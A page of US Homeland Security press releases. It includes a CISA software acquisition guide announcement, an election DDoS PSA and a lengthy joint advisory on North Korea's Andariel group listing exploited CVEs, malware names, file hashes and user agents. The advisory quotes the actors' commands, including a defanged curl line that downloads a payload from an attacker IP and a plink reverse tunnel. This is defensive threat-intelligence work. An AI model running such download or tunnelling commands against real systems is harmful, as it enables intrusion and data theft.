US Department of Homeland Security – Page 12

August 2, 2024

CISA Releases Software Acquisition Guide for Government Enterprise Consumers: Software Assurance in the Cyber-Supply Chain Risk Management (C-SCRM) Lifecycle

Source: US Department of Homeland Security

WASHINGTON – Today, the Cybersecurity and Infrastructure Security Agency (CISA) announced the release of its “Software Acquisition Guide for Government Enterprise Consumers: Software Assurance in the Cyber-Supply Chain Risk Management (C-SCRM) Lifecycle.” Developed by the Information and Communications Technology (ICT) Supply Chain Risk Management (SCRM) Task Force, this guide consolidates relevant software assurance guidance and frameworks into a single document and enables stakeholders to easily navigate through these requirements in a clear, concise manner.

“The ICT SCRM Task Force Software Assurance Working Group created the guide for acquisition and procurement organizations to initiate discussions with their cybersecurity staff and enterprise risk owners, such as Chief Information Officers and Chief Information Security Officers, to ensure the security of their software acquisitions,” said CISA National Risk Management Center Assistant Director and ICT SCRM Task Force Co-Chair Mona Harrington. “It provides critical federal guidance, including CISA’s Secure by Design principles, and a list of questions that should be addressed to mitigate risk exposure from software obtained from third parties.

Many well-known cyber-attacks have exploited vulnerabilities and weaknesses in software and within software supply chains in proprietary and open-source software, adversely impacting private sector and government enterprises. This recurring issue prompted an increased need to rebalance responsibilities for cybersecurity risks between software suppliers and consumers. The Software Acquisition Guide is in response to the core challenges of software assurance and cybersecurity transparency in the acquisition process, focusing primarily on software lifecycle activities.

“This Guide provides a foundation for addressing product security principles within the software lifecycle, including design, development, deployment, and operational use,” said Robert Mayer, Senior Vice President of Cybersecurity and Innovation at USTelecom and ICT SCRM Task Force Co-Chair. “I am thankful to the Software Assurance Working Group for their significant contribution having worked with numerous entities over the last two years to ensure the Guide will be relevant and useful to acquisitions and procurement professionals.”

By engaging in candid discussions of software supply chain processes, better, risk-informed decisions can be made for the acquisition and procurement of software products and services. Consumers, demanding security be built into the products and services they purchase, can function as the market signal, driving systemic changes across the software supplier ecosystem.

“The anticipation for the release of Software Acquisition Guide not only garnered attention from Task Force members but also sparked an outpouring of interest from various stakeholders at the ICT SCRM Task Force Conference that took place on June 12, 2024,” said John Miller, Senior Vice President of Policy for Trust, Data, and Technology and General Counsel, Information Technology Industry (ITI) Council and ICT SCRM Task Force Co-Chair. “This Guide serves as a useful tool for customers of acquisition and procurement organizations who can use this guidance as a basis for describing, assessing, and measuring security practices relative to the software life cycle. A huge thank you to the Software Assurance Working Group for their work and diligence in creating such a thorough and groundbreaking document.”

The ICT SCRM Task Force also developed an accompanying Spreadsheet that complements the Software Acquisition Guide and assists users with navigating the document.

The Task Force will host a webinar on the Software Acquisition Guide in the fall. Registration information will be posted on the ICT SCRM Task Force website.

###

About CISA

As the nation’s cyber defense agency and national coordinator for critical infrastructure security, the Cybersecurity and Infrastructure Security Agency leads the national effort to understand, manage, and reduce risk to the digital and physical infrastructure Americans rely on every hour of every day.

Visit CISA.gov for more information and follow us on Twitter, Facebook, LinkedIn, Instagram.

August 2, 2024

CISA Names First Chief Artificial Intelligence Officer

Source: US Department of Homeland Security

WASHINGTON – Today, the Cybersecurity and Infrastructure Security Agency (CISA) announced its first CISA Chief Artificial Intelligence Officer, Lisa Einstein. This selection reflects CISA’s commitment to responsibly use AI to advance its cyber defense mission and to support critical infrastructure owners and operators across the United States in the safe and secure development and adoption of AI. Einstein has led CISA’s AI efforts since 2023 as CISA’s Senior Advisor for AI. Since 2022, Einstein also served as the Executive Director of the CISA Cybersecurity Advisory Committee.

“I am proud of how our team at CISA has come together in the last two years to understand and respond to rapid advancements in AI—many of which have significant implications for our core missions of cyber defense and critical infrastructure security,” said CISA Director Jen Easterly. “Lisa Einstein has been central to that effort. Beyond her technical expertise, she’s an inspirational leader who has brought together colleagues across the agency around a clear and impactful vision. I could not be more thrilled to have her take on this important new role, which will help us continue to build AI expertise into the fabric of our agency and ensure we are equipped to effectively leverage the power of AI well into the future.”

Strong cybersecurity is foundational to trustworthy AI, and the responsible use of AI is increasingly relevant for the security of critical infrastructure. CISA has established this new position to institutionalize our ongoing efforts to responsibly govern our own uses of AI and to ensure critical infrastructure partners develop and adopt AI in ways that are safe and secure.

“I care deeply about CISA’s mission – if we succeed, the critical systems that Americans rely on every day will become safer, more reliable, and more capable. AI tools could accelerate our progress. But we will only reap their benefits and avoid harms from their misapplication or abuse if we all work together to prioritize safety, security, and trustworthiness in the development and deployment of AI tools,” said Einstein. “It has been a privilege to work with the dedicated and talented CISA team and with our partners across the United States and around the world over the last two years. I am honored to serve in this new role to help CISA tackle this important challenge.”

For more on CISA’s work on AI, visit cisa.gov/ai.

###

About CISA

Visit CISA.gov for more information and follow us on Twitter, Facebook, LinkedIn, Instagram.

August 1, 2024

Readout of Secretary of Homeland Security Alejandro Mayorkas’s Meeting with Foreign Minister Enrique Reina of Honduras

Source: US Department of Homeland Security

On Friday, July 26th, Secretary of Homeland Security Alejandro N. Mayorkas met with Honduran Foreign Minister Enrique Reina to address irregular migration and combat transnational organized crime through continued strong cooperation. The Department of Homeland Security (DHS) welcomed Honduras’ recent investments to strengthen support for Hondurans abroad, including expanding its U.S. consular network. The Honduran government has also worked on internal efforts to generate local agricultural employment opportunities through recently passed legislation that seeks to address internal displacement and reduce emigration push factors. Foreign Minister Reina updated Secretary Mayorkas on Honduras’ work to promote the use of lawful pathways to come to the United States, including H-2A and H-2B visa programs. He also thanked Secretary Mayorkas for the recently announced actions to promote family unity for noncitizens married to a U.S. citizen and the recent extension of Employment Authorization Document validity for certain Temporary Protected Status beneficiaries, including certain Hondurans.

Honduras agreed to further streamline its coordination with the United States on removals of Honduran noncitizens who do not have a legal basis to remain in the United States. Through bilateral efforts, Honduras has increased its capacity to receive removal flights and will begin electronically verifying the nationality of Hondurans subject to removal orders across its entire U.S. consular network to afford more expeditious processing and reduced time in custody. To support those returning home, Honduras is also working to expand its reintegration programs, including with U.S. support.

Collective migration management efforts have effectively reduced the number of Hondurans encountered at the U.S. Southwest Border and fewer have fallen prey to smugglers who have no regard for their safety. The Presidential Proclamation and joint interim final rule issued by DHS and the Department of Justice (DOJ) have now been in effect for seven weeks, helping reduce the total number of encounters, including of Hondurans, at our Southwest Border by 55%. The Border Patrol’s 7-day average has decreased to below 1,800 encounters per day. 

August 1, 2024

CISA and FBI Release Joint PSA: Putting Potential DDoS Attacks During the 2024 Election Cycle in Context

Source: US Department of Homeland Security

WASHINGTON – Today, as part of their public service announcement series for the 2024 election cycle, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) jointly released Just So You Know: DDoS Attacks Could Hinder Access to Election Information, Would Not Prevent Voting. This public service announcement is to raise awareness that Distributed Denial of Service (DDoS) attacks on election infrastructure, or adjacent infrastructure that supports election operations, could hinder public access to election information, but would not impact the security or integrity of election processes. The PSA is part of the agencies’ ongoing commitment to provide the public with information and the election infrastructure community with the support they need to run safe and secure elections.

“With Election Day less than 100 days away, it is important to help put into context some of the incidents the American public may see during the election cycle that, while potentially causing some minor disruptions, will not fundamentally impact the security or integrity of the democratic process,” said CISA Senior Advisor Cait Conley. “DDoS attacks are one example of a tactic that we have seen used against election infrastructure in the past and will likely see again in the future, but they will NOT affect the security or integrity of the actual election. They may cause some minor disruptions or prevent the public from receiving timely information. It is important to talk about these potential issues now, because nefarious actors, like our foreign adversaries or cybercriminals, could use DDoS incidents to cast doubt on the election systems or processes. An informed public is key to neutralizing the impact of foreign influence operations and disinformation, which is why we put out this advisory on what a DDoS attack could – and couldn’t – do.”

“DDoS are low-level attacks that work by overwhelming websites with traffic to render them inaccessible,” said FBI Deputy Assistant Director Cynthia Kaiser. “Given the prevalence of false claims about DDoS attacks in prior U.S. and foreign elections, we are warning that DDoS attacks against election-related websites could temporarily disrupt access to some online election functions, like voter look-up tools, but would not prevent voting or compromise the integrity of voting systems. This warning highlights the importance for voters to seek out information about how to vote prior to Election Day and demonstrates the FBI’s and CISA’s continued commitment to sharing information with the public about potential cyber threats.”

This publication is to help educate the public on what DDoS attacks are, their effects on election infrastructure, recommendations for voters, and victim reporting information.

CISA and the FBI encourage the public to report information concerning suspicious or criminal activity, such as DDoS attacks, to their local FBI field office, by calling 1-800-CALL-FBI (1-800-225-53240, or online at ic3.gov). DDoS attacks impacting election infrastructure can also be reported to CISA by calling 1-844-Say-CISA (1-844-729-2472), emailing report@cisa.dhs.gov, or submitting online at www.cisa.gov/report. To learn more, visit Just So You Know: DDoS Attacks Could Hinder Access to Election Information, Would Not Prevent Voting on CISA.gov.

###

About CISA

Visit CISA.gov for more information and follow us on Twitter, Facebook, LinkedIn, Instagram.

July 26, 2024

Statement from Secretary Mayorkas on Arrest of Alleged Leaders of Sinaloa Cartel

Source: US Department of Homeland Security

Secretary of Homeland Security Alejandro N. Mayorkas released the following statement on the arrest of alleged leaders of the Sinaloa Cartel Ismael Zambada Garcia (“El Mayo”) and Joaquin Guzman Lopez:

“The Sinaloa Cartel pioneered the manufacture of fentanyl and has for years trafficked it into our country, killing hundreds of thousands of Americans and devastating countless communities. The Biden-Harris Administration has taken a relentless, unprecedented, and comprehensive approach to combating the scourge of fentanyl. Today, two of the Cartel’s alleged top leaders – Ismael Zambada Garcia (“El Mayo”) and Joaquin Guzman Lopez – are in U.S. custody and will be brought to justice. I commend the dedicated, brave agents and officers of Homeland Security Investigations and the FBI whose years of work, alongside others in the law enforcement community, have, at great personal sacrifice, disrupted and dismantled cartel operations across the world.”

July 26, 2024

North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs

Source: US Department of Homeland Security

The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju:

The RGB 3^rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3^rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities.

The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration.

The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.

The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations:

Andariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in Pyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks targeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware operations.

The actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear, engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for more victimology information.

*Table 1. Andariel Cyber Espionage Victimology*
Industry	Information Targeted
Defense	Heavy and light tanks and self-propelled howitzers Light strike vehicles and ammunition supply vehicles Littoral combat ships and combatant craft Submarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous underwater vehicles (AUVs) Modeling and simulation services
Aerospace	Fighter aircraft and unmanned aerial vehicles (UAVs) Missiles and missile defense systems Satellites, satellite communications, and nano-satellite technology Surveillance radar, phased-array radar, and other radar systems
Nuclear	Uranium processing and enrichment Material waste and storage Nuclear power plants Government nuclear facilities and research institutes
Engineering	Shipbuilding and marine engineering Robot machinery and mechanical arms Additive manufacturing and 3D printing components and technology Casting, fabrication, high-heat metal molding, and rubber and plastic molding Machining processes and technology

The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs.

Ransomware

Andariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.

Malicious Cyber Espionage Activity

This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.

Reconnaissance and Enumeration

While there is limited available information on the group’s initial reconnaissance methods, the actors likely identify vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about their victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when published to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. CVEs researched include:

CVE-2023-46604 – Apache ActiveMQ
CVE-2023-42793 – TeamCity
CVE-2023-3519 – Citrix NetScaler
CVE-2023-35078 – Ivanti Endpoint Manager Mobile (EPMM)
CVE-2023-34362 – MOVEIt
CVE-2023-33246 – RocketMQ
CVE-2023-32784 – KeePass
CVE-2023-32315 – Openfire
CVE-2023-3079 – Google Chromium V8 Type Confusion
CVE-2023-28771 and CVE-2023-33010 – Zyxell firmware
CVE-2023-2868 – Barracuda Email Security Gateway
CVE-2023-27997 – FortiGate SSL VPN
CVE-2023-25690 – Apache HTTP Server
CVE-2023-21932 – Oracle Hospitality Opera 5
CVE-2023-0669 – GoAnywhere MFT
CVE-2022-47966 – ManageEngine
CVE-2022-41352 and CVE-2022-27925 – Zimbra Collaboration Suite
CVE-2022-30190 – Microsoft Windows Support Diagnostic Tool
CVE-2022-25064 – TP-LINK
CVE-2022-24990 and CVE-2021-45837 – TerraMaster NAS
CVE-2022-24785 – Moment.js
CVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 – PHP Everywhere
CVE-2022-22965 – Spring4Shell
CVE-2022-22947 – Spring Cloud Gateway
CVE-2022-22005 – Microsoft SharePoint Server
CVE-2022-21882 – Win32k Elevation of Privilege
CVE-2021-44228 – Apache Log4j
CVE-2021-44142 – Samba vfs_fruit module
CVE-2021-43226, CEV-2021-43207, CVE-2021-36955 – Windows log file vulnerabilities
CVE-2021-41773 – Apache HTTP Server 2.4.49
CVE-2021-40684 – Talend ESB Runtime
CVE-2021-3018 – IPeakCMS 3.5
CVE-2021-20038 – SMA100 Apache httpd server (SonicWall)
CVE-2021-20028 – SonicWall Secure Remote Access (SRA)
CVE-2019-15637 – Tableau
CVE-2019-7609 – Kibana
CVE-2019-0708 – Microsoft Remote Desktop Services
CVE-2017-4946 – VMware V4H and V4PA

Resource Development, Tooling, and Remote Access Tools

The actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has developed RATs, including the following, to permit remote access and manipulation of systems and lateral movement.

Atharvan
ELF Backdoor
Jupiter
MagicRAT
“No Pineapple”
TigerRAT
Valefor/VSingle
ValidAlpha
YamaBot
NukeSped
Goat RAT
Black RAT
AndarLoader
DurianBeacon
Trifaux
KaosRAT
Preft
Andariel Scheduled Task Malware
BottomLoader (see Cisco Talos blog Operation Blacksmith)
NineRAT (see Cisco Talos blog Operation Blacksmith)
DLang (see Cisco Talos blog Operation Blacksmith)
Nestdoor (see AhnLab blog)

These tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow the actors to maintain access to the victim system with each implant having a designated C2 node.

Commodity Malware

Commodity malware is malicious software widely available for purchase or use and is leveraged by numerous different threat actors. The use of publicly available malware enables the actors to conceal and obfuscate their identities and leads to attribution problems. The authoring agencies are reliant on the use of custom malware and loaders, along with overlapping C2 nodes to attribute commodity malware to the actors. The actors have at times achieved great success leveraging just open source malware. The authoring agencies have identified the following open-source tools as used and/or customized by the actors:

Initial Access

The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation. The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously [T1190].

Execution

The actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration. While individual commands typically vary, the authoring agencies assess the actors prefer netstat commands, such as netstat –naop and netstat –noa [T1059]. Example commands used by the actors include the following:

netstat –naop
netstat –noa
pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password]
curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:userspublicnotify[.]exe
C:windowssystem32cmd.exe /c systeminfo | findstr Logon

These actors often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the English language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft Corporation”) found across numerous RGB 3rd Bureau malware samples.

Defense Evasion

The actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and other commercial tools have advanced anti-debugging and detection capabilities. These files are typically multiple megabytes in size and often contain unusual file section names such as vmp0 and vmp1 for VMProtect and Themida or randomized file section names for Themida [T1027].

Credential Access

The actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including the use of publicly available credential theft tools such as Mimikatz, ProcDump, and Dumpert and accessing the Active Directory domain database through targeting of the NTDS.dit file. The authoring agencies assess the actors change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the vssadmin command-line utility to back up a volume to retrieve a copy of the NTDS.dit file containing Active Directory data. In another instance, the actors were observed collecting registry hive data for offline extraction of credentials [T1003].

Discovery

The actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files. The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes [T1087, T1083].

The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network [T1021.002].

Lateral Movement

The actors also use system logging for discovery to move laterally. The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the %Temp% directory.

The actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021].

Command and Control

The actors leverage techniques and infrastructure positioned around the world to send commands to compromised systems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy [T1090, T1071].

Collection and Exfiltration

Malware previously used by the actors permitted placement and access to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling [T1560, T1039].

The actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data [T1567]. The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols [T1048].

The actors have also been identified staging files for exfiltration on victim machines, establishing Remote Desktop Protocol connections, and conducting HTTP GET requests on port 80 to receive information [T1021].

Indicators of Compromise

See below for Andariel IOCs.

The following include observed MD5 hashes:

88a7c84ac7f7ed310b5ee791ec8bd6c5
6ab4eb4c23c9e419fbba85884ea141f4
97ce00c7ef1f7d98b48291d73d900181
079b4588eaa99a1e802adf5e0b26d8aa
0873b5744d8ab6e3fe7c9754cf7761a3
0d696d27bae69a62def82e308d28857a
0ecf4bac2b070cf40f0b17e18ce312e6
17c46ed7b80c2e4dbea6d0e88ea0827c
1f2410c3c25dadf9e0943cd634558800
2968c20a07cfc97a167aa3dd54124cda
33e85d0f3ef2020cdb0fc3c8d80e8e69
4118d9adce7350c3eedeb056a3335346
4aa57e1c66c2e01f2da3f106ed2303fa
58ad3103295afcc22bde8d81e77c282f
5c41cbf8a7620e10f158f6b70963d1cb
61a949553d35f31957db6442f36730c5
72a22afde3f820422cfdbba7a4cbabde
84bd45e223b018e67e4662c057f2c47e
86465d92f0d690b62866f52f5283b9fc
8b395cc6ecdec0900facf6e93ec48fbb
97f352e2808c78eef9b31c758ca13032
a50f3b7aa11b977ae89285b60968aa67
afd25ce56b9808c5ed7eade75d2e12a7
afdeb24975a318fc5f20d9e61422a308
b697b81b341692a0b137b2c748310ea7
bcac28919fa33704a01d7a9e5e3ddf3f
c027d641c4c1e9d9ad048cda2af85db6
c892c60817e6399f939987bd2bf5dee0
cdeae978f3293f4e783761bc61b34810
d0f310c99476f1712ac082f78dd29fdc
d8da33fae924b991b776797ba8cde24c
e230c5728f9ea5a94e390e7da7bf1ffa
f4d46629ca15313b94992f3798718df7
fb84a392601fc19aeb7f8ce11b3a4907
ff3194d3d5810a42858f3e22c91500b1
13b4ce1fc26d400d34ede460a8530d93
41895c5416fdc82f7e0babc6bb6c7216
c2f8c9bb7df688d0a7030a96314bb493
33a3da2de78418b89a603e28a1e8852c
4896da30a745079cd6265b6332886d45
73eb2f4f101aab6158c615094f7a632a
7f33d2d2a2ce9c195202acb59de31eee
e1afd01400ef405e46091e8ef10c721c
fe25c192875ec1914b8880ea3896cda2
232586f8cfe82b80fd0dfa6ed8795c56
c1f266f7ec886278f030e7d7cd4e9131
49bb2ad67a8c5dfbfe8db2169e6fa46e
beb199b15bd075996fa8d6a0ed554ca8
4053ca3e37ed1f8d37b29eed61c2e729
3a0c8ae783116c1840740417c4fbe678
0414a2ab718d44bf6f7103cff287b312
ca564428a29faf1a613f35d9fa36313f
ad6d4eb34d29e350f96dc8df6d8a092e
dc70dc9845aa747001ebf2a02467c203
3d2ec58f37c8176e0dbcc47ff93e5a76
0a09b7f2317b3d5f057180be6b6d0755
1ffccc23fef2964e9b1747098c19d956
9112efb49cae021abebd3e9a564e6ca4
ac0ada011f1544aa3a1cf27a26f2e288
0211a3160cc5871cbcd4e5514449162b
7416ea48102e2715c87edd49ddbd1526
a2aefb7ab6c644aa8eeb482e27b2dbc4
e7fd7f48fbf5635a04e302af50dfb651
33b2b5b7c830c34c688cf6ced287e5be
e5410abaaac69c88db84ab3d0e9485ac
eb35b75369805e7a6371577b1d2c4531
5a3f3f75048b9cec177838fb8b40b945
9d7bd0caed10cc002670faff7ca130f5
8434cdd34425916be234b19f933ad7ea
bbaee4fe73ccff1097d635422fdc0483
79e474e056b4798e0a3e7c60dd67fd28
95c276215dcc1bd7606c0cb2be06bf70
426bb55531e8e3055c942a1a035e46b9
cfae52529468034dbbb40c9a985fa504
deae4be61c90ad6d499f5bdac5dad242
bda0686d02a8b7685adf937cbcd35f46
6de6c27ca8f4e00f0b3e8ff5185a59d1
c61a8c4f6f6870c7ca0013e084b893d2
5291aed100cc48415636c4875592f70c
f4795f7aec4389c8323f7f40b50ae46f
cf1a90e458966bcba8286d46d6ab052c
792370eb01e16ac3dc511143932d0e1d
612538328e0c4f3e445fb58ef811336a
9767aa592ec2d6ae3c7d40b6049d0466
b22fd0604c4f189f2b7a59c8f48882dd
e53ca714787a86c13f07942a56d64efa
c7b09f1dd0a5694de677f3ecceda41b7
c8346b39418f92725719f364068a218d
730bff14e80ffd7737a97cdf11362ab5
9a481bc83fea1dea3e3bdfff5e154d44
ddb1f970371fa32faae61fc5b8423d4b
6c2b947921e7c77d9af62ce9a3ed7621
977d30b261f64cc582b48960909d0a89
7ce51b56a6b0f8f78056ddfc5b5de67c
dd9625be4a1201c6dfb205c12cf3a381
ecb4a09618e2aba77ea37bd011d7d7f7
0fd8c6f56c52c21c061a94e5765b27b4
c90d094a8fbeaa8a0083c7372bfc1897
0055a266aa536b2fdadb3336ef8d4fba
55bb271bbbf19108fec73d224c9b4218
0c046a2f5304ed8d768795a49b99d6e4
f34664e0d9a10974da117c1ca859dba8
a2c2099d503fcc29478205f5aef0283b
e439f850aa8ead560c99a8d93e472225
7c30ed6a612a1fd252565300c03c7523
81738405a7783c09906da5c7212e606b
c027d641c4c1e9d9ad048cda2af85db6
eb7ba9f7424dffdb7d695b00007a3c6d
3e9ee5982e3054dc76d3ba5cc88ae3de
073e3170a8e7537ff985ec8316319351
9b0e7c460a80f740d455a7521f0eada1
2d02f5499d35a8dffb4c8bc0b7fec5c2
0984954526232f7d05910aa5b07c5893
4156a7283284ece739e1bae05f99e17c
3026d419ee140f3c6acd5bff54132795
7aa132c0cc63a38fb4d1789553266fc7
1a0811472fad0ff507a92c957542fffd
f8aef59d0c5afe8df31e11a1984fbc0a
82491b42b9a2d34b13137e36784a67d7
0a199944f757d5615164e8808a3c712a
9c97ea18da290a6833a1d36e2d419efc
16f768eac33f79775a9672018e0d64f5

The following include observed SHA-256 hashes:

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6
db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984
773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df
05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d
e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe
1962ebb7bf8d2b306c6f3b55c3dcd69a755eeff1a17577b7606894b781841c3a
f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb
6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1
b7435d23769e79fcbe69b28df4aef062685d1a631892c2354f96d833eae467be
66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66
def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563
323cbe7a3d050230cfaa822c2a22160b4f8c5fe65481dd329841ee2754b522d9
74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643
1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f
8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4
452ca47230afd4bb85c45af54fcacbfa544208ef8b4604c3c5caefe3a64dcc19
199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1
2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc
ce779e30502ecee991260fd342cc0d7d5f73d1a070395b4120b8d300ad11d694
db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984
c28bb61de4a6ad1c5e225ad9ec2eaf4a6c8ccfff40cf45a640499c0adb0d8740
34d5a5d8bec893519f204b573c33d54537b093c52df01b3d8c518af08ee94947
664f8d19af3400a325998b332343a9304f03bab9738ddab1530869eff13dae54
772b06f34facf6a2ce351b8679ff957cf601ef3ad29645935cb050b4184c8d51
aa29bf4292b68d197f4d8ca026b97ec7785796edcb644db625a8f8b66733ab54
9a5504dcfb7e664259bfa58c46cfd33e554225daf1cedea2ec2a9d83bbbfe238
c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c
8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b
38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07

The following include a list of user agent strings used by the actors:

Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0

Detection Methods

See Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect malware used by the actors.

*Table 2. YARA Rules*
